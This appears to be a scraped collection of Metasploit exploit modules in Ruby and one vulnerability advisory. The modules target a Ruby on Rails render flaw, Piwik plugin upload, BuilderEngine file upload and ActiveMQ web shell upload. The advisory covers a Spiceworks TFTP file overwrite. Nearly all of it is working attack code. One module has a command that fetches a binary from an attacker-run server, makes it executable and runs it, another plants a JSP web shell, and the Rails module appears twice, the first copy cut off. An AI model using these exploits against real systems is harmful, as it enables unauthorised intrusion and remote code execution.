rand_text_alpha(8+rand(8)) fn = rand_text_alpha(8+rand(8)) un = rand_text_alpha(8+rand(8)) pn = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") cmd = "wget #{@service_url} -O /tmp/#{@bd};" cmd << "chmod 755 /tmp/#{@bd};" cmd << "/tmp/#{@bd}" pay = "<%=`#{cmd}`%>" print_status("uploading image...") data = Rex::MIME::Message.new data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, 'uri' => normalize_uri(datastore['URIPATH'], pn), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ return true else # this is where we pull the log file if leak_log return true end end return false end def leak_log # path to the log /proc/self/fd/7 # this bypasses the extension check res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), 'method' => 'GET', }, 60) if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ return true end return false end def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end # do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end def render_tmpfile @path.gsub!(/\//, '%2f') res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], @path), 'method' => 'GET', }, 1) end def exploit print_status("Sending initial request to detect exploitability") start_http_server if send_payload print_good("injected payload") render_tmpfile # we need to delay, for the stager select(nil, nil, nil, 5) end end end
  16. require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example: def show render params[:id] end Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution. }, 'Author' => [ 'mr_me <[email protected]>', # necromanced old bug & discovered new vector rce vector 'John Poulin (forced-request)' # original render bug finder ], 'References' => [ [ 'CVE', '2016-0752'], [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit ], 'License' => MSF_LICENSE, 'Platform' => ['linux', 'bsd'], 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true, }, 'Privileged' => false, 'Targets' => [ [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2016')) register_options( [ Opt::RPORT(3000), OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), ], self.class) end def check # this is the check for the dev environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), 'method' => 'GET', }, 60) # if the page controller is dynamically rendering, its for sure vuln if res and res.body =~ /render params/ return CheckCode::Vulnerable end # this is the check for the prod environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), 'method' => 'GET', }, 60) # if we can read files, its likley we can execute code if res and res.body =~ /ruby/ return CheckCode::Appears end return CheckCode::Safe end def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end def send_payload @bd = rand_text_alpha(8+rand(8)) fn = rand_text_alpha(8+rand(8)) un = rand_text_alpha(8+rand(8)) pn = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") cmd = "wget #{@service_url} -O /tmp/#{@bd};" cmd << "chmod 755 /tmp/#{@bd};" cmd << "/tmp/#{@bd}" pay = "<%=`#{cmd}`%>" print_status("uploading image...") data = Rex::MIME::Message.new data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, 'uri' => normalize_uri(datastore['URIPATH'], pn), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ return true else # this is where we pull the log file if leak_log return true end end return false end def leak_log # path to the log /proc/self/fd/7 # this bypasses the extension check res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), 'method' => 'GET', }, 60) if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ return true end return false end def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end # do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end def render_tmpfile @path.gsub!(/\//, '%2f') res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], @path), 'method' => 'GET', }, 1) end def exploit print_status("Sending initial request to detect exploitability") start_http_server if send_payload print_good("injected payload") render_tmpfile # we need to delay, for the stager select(nil, nil, nil, 5) end end end
  17. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info( info, 'Name' => 'Piwik Superuser Plugin Upload', 'Description' => %q{ This module will generate a plugin, pack the payload into it and upload it to a server running Piwik. Superuser Credentials are required to run this module. This module does not work against Piwik 1 as there is no option to upload custom plugins. Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'FireFart' # Metasploit module ], 'References' => [ [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ] ], 'DisclosureDate' => 'Feb 05 2017', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Piwik', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']), OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']), OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def normalized_index normalize_uri(target_uri, 'index.php') end def get_piwik_version(login_cookies) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => login_cookies, 'vars_get' => { 'module' => 'Feedback', 'action' => 'index', 'idSite' => '1', 'period' => 'day', 'date' => 'yesterday' } }) piwik_version_regexes = [ /<title>About Piwik ([\w\.]+) -/, /content-title="About&#x20;Piwik&#x20;([\w\.]+)"/, /<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m ] if res && res.code == 200 for r in piwik_version_regexes match = res.body.match(r) if match return match[1] end end end # check for Piwik version 1 # the logo.svg is only available in version 1 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg') }) if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/ return "1.x" end nil end def is_superuser?(login_cookies) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => login_cookies, 'vars_get' => { 'module' => 'Installation', 'action' => 'systemCheckPage' } }) if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/ return false elsif res && res.body =~ /id="systemCheckRequired"/ return true else return false end end def generate_plugin(plugin_name) plugin_json = %Q|{ "name": "#{plugin_name}", "description": "#{plugin_name}", "version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}", "theme": false }| plugin_script = %Q|<?php namespace Piwik\\Plugins\\#{plugin_name}; class #{plugin_name} extends \\Piwik\\Plugin { public function install() { #{payload.encoded} } } | zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script) zip.add_file("#{plugin_name}/plugin.json", plugin_json) zip.pack end def exploit print_status('Trying to detect if target is running a supported version of piwik') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index }) if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/ print_good('Detected Piwik installation') else fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik') end print_status("Authenticating with Piwik using #{username}:#{password}...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'vars_get' => { 'module' => 'Login', 'action' => 'index' } }) login_nonce = nil if res && res.code == 200 match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/) if match login_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil? cookies = res.get_cookies res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Login', 'action' => 'index' }, 'vars_post' => { 'form_login' => "#{username}", 'form_password' => "#{password}", 'form_nonce' => "#{login_nonce}" } }) if res && res.redirect? && res.redirection # update cookies cookies = res.get_cookies else # failed login responds with code 200 and renders the login form fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik') end print_good('Authenticated with Piwik') print_status("Checking if user #{username} has superuser access") superuser = is_superuser?(cookies) if superuser print_good("User #{username} has superuser access") else fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access") end print_status('Trying to get Piwik version') piwik_version = get_piwik_version(cookies) if piwik_version.nil? print_warning('Unable to detect Piwik version. Trying to continue.') else print_good("Detected Piwik version #{piwik_version}") end if piwik_version == '1.x' fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module') end # Only versions after 3 have a seperate Marketplace plugin if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3') marketplace_available = true else marketplace_available = false end if marketplace_available print_status("Checking if Marketplace plugin is active") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Marketplace', 'action' => 'index' } }) fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/ print_status('Marketplace plugin is not enabled, trying to enable it') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'plugins' } }) mp_activate_nonce = nil if res && res.code == 200 match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/) if match mp_activate_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'activate', 'pluginName' => 'Marketplace', 'nonce' => "#{mp_activate_nonce}" } }) if res && res.redirect? print_good('Marketplace plugin enabled') else fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.') end else print_good('Seems like the Marketplace plugin is already enabled') end end print_status('Generating plugin') plugin_name = Rex::Text.rand_text_alpha(10) zip = generate_plugin(plugin_name) print_good("Plugin #{plugin_name} generated") print_status('Uploading plugin') # newer Piwik versions have a seperate Marketplace plugin if marketplace_available res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Marketplace', 'action' => 'overview' } }) else res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'marketplace' } }) end upload_nonce = nil if res && res.code == 200 match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m) if match upload_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil? # plugin files to delete after getting our session register_files_for_cleanup("plugins/#{plugin_name}/plugin.json") register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php") data = Rex::MIME::Message.new data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"") res = send_request_cgi( 'method' => 'POST', 'uri' => normalized_index, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'uploadPlugin', 'nonce' => "#{upload_nonce}" } ) activate_nonce = nil if res && res.code == 200 match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/) if match activate_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil? print_status('Activating plugin and triggering payload') send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'activate', 'nonce' => "#{activate_nonce}", 'pluginName' => "#{plugin_name}" } }, 5) end end
  18. Hacking

    [+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt [+] ISR: APPARITIONSEC Vendor: ================== www.spiceworks.com Product: ================= Spiceworks - 7.5 Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices. It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system, a user portal, an integrated knowledge base, and mobile ticket management. Vulnerability Type: ============================================== Improper Access Control File Overwrite / Upload CVE Reference: ============== CVE-2017-7237 Security Issue: ================ The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations" directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed. Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing Spiceworks user. References - released April 3, 2017: ==================================== https://community.spiceworks.com/support/inventory/docs/network-config#security Proof: ======= 1) Install Spiceworks 2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig 3) Original someconfig gets overwritten OR Arbitrary file upload c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ====================================================================== Vendor Notification: March 13, 2017 Sent vendor e.g. POC : March 23, 2017 Request status : March 30, 2017 Vendor reply: "We are still working on this" March 30, 2017 Vendor reply :"Thanks for bringing this to our attention" and releases basic security note of issue on website : April 3, 2017 April 5, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "BuilderEngine Arbitrary File Upload Vulnerability and execution", 'Description' => %q{ This module exploits a vulnerability found in BuilderEngine 3.5.0 via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious file, which would result in arbitrary remote code execution under the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'metanubix', # PoC 'Marco Rivoli' # Metasploit ], 'References' => [ ['EDB', '40390'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['BuilderEngine 3.5.0', {}] ], 'Privileged' => false, 'DisclosureDate' => "Sep 18 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/']) ]) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/') }) if res && res.code == 200 && !res.body.blank? return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path peer = "#{rhost}:#{rport}" php_pagename = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new payload_encoded = Rex::Text.rand_text_alpha(1) payload_encoded << "<?php " payload_encoded << payload.encoded payload_encoded << " ?>\r\n" data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"") post_data = data.to_s res = send_request_cgi({ 'uri' => normalize_uri(uri,'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res if res.code == 200 && res.body =~ /files|#{php_pagename}/ print_good("Our payload is at: #{php_pagename}. Calling payload...") register_file_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end print_status("Calling payload...") send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(uri,'files/', php_pagename) ) end end
  20. Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ActiveMQ web shell upload', 'Description' => %q( The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. ), 'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-3088' ], [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ] ], 'Privileged' => true, 'Platform' => %w{ java linux win }, 'Targets' => [ [ 'Java Universal', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ], [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ], [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ] ], 'DisclosureDate' => "Jun 01 2016", 'DefaultTarget' => 0)) register_options( [ OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]), OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]), OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]), Opt::RPORT(8161) ]) register_advanced_options( [ OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil]) ]) end def jsp_text(payload_name) %{ <%@ page import="java.io.*" %><%@ page import="java.net.*" %><% URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()}); Class c = cl.loadClass("metasploit.Payload"); c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]}); %>} end def exploit jar_payload = payload.encoded_jar.pack payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8)) host = "#{datastore['RHOST']}:#{datastore['RPORT']}" @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}" paths = get_upload_paths paths.each do |path| if try_upload(path, jar_payload, payload_name) break handler if trigger_payload(payload_name) print_error('Unable to trigger payload') end end end def try_upload(path, jar_payload, payload_name) ['.jar', '.jsp'].each do |ext| file_name = payload_name + ext data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" } upload_uri = normalize_uri('fileserver', file_name) print_status("Uploading #{move_headers['Destination']}") register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true') return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) && send_request('MOVE', upload_uri, 204, 'headers' => move_headers) @trigger_resource = /webapps(.*)/.match(path)[1] end true end def get_upload_paths base_path = "#{get_install_path}/webapps" custom_path = datastore['UploadPath'] return [normalize_uri(base_path, custom_path)] unless custom_path.nil? [ "#{base_path}/api/", "#{base_path}/admin/" ] end def get_install_path properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/) return match[1] unless match.nil? end def send_request(method, uri, expected_response = 200, opts = {}) opts['headers'] ||= {} opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass']) opts['headers']['Connection'] = 'close' r = send_request_cgi( { 'method' => method, 'uri' => uri }.merge(opts) ) return false if r.nil? || expected_response != r.code.to_i r end def trigger_payload(payload_name) send_request('POST', @url + @trigger_resource + payload_name + '.jsp') end def error_out print_error('Upload failed') @trigger_resource = nil false end end